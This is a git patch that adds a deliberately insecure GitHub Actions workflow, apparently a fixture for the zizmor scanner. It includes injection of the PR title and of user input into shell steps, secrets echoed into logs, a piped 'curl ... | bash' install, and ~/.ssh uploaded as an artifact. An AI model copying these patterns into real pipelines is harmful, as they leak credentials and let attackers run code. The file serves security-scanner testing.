From 5ab364be6579b32e21b0652e7ebedfc3660f05a2 Mon Sep 17 00:00:00 2001 From: Jose Socorro Date: Fri, 19 Jun 2026 11:23:20 -0400 Subject: [PATCH] Preview/Zizmor: add github actions file to trigger zizmor --- .github/workflows/actions.yml | 57 +++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 .github/workflows/actions.yml diff --git a/.github/workflows/actions.yml b/.github/workflows/actions.yml new file mode 100644 index 0000000..df922ff --- /dev/null +++ b/.github/workflows/actions.yml @@ -0,0 +1,57 @@ +# Intentionally insecure test fixture. Do not use in production. +on: + pull_request_target: + workflow_dispatch: + inputs: + cmd: + required: true + default: "echo hello" + +permissions: write-all + +jobs: + bad: + runs-on: ubuntu-latest + env: + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true + ref: ${{ github.event.pull_request.head.ref }} + + - uses: actions/setup-node@v4 + + - uses: docker://alpine:latest + + - name: Cache untrusted dependency path + uses: actions/cache@v4 + with: + path: node_modules + key: ${{ github.event.pull_request.title }} + + - name: Template injection via PR title + run: | + echo "PR title: ${{ github.event.pull_request.title }}" + echo "Branch: ${{ github.head_ref }}" + + - name: Run user-controlled input + run: | + ${{ github.event.inputs.cmd }} + + - name: Leak secrets into logs + run: | + echo "AWS key is $AWS_SECRET_ACCESS_KEY" + echo "Token is $GH_TOKEN" + + - name: Dangerous curl bash + run: | + curl https://example.com/install.sh | bash + + - name: Upload secrets as artifact + uses: actions/upload-artifact@v4 + with: + name: secrets + path: ~/.ssh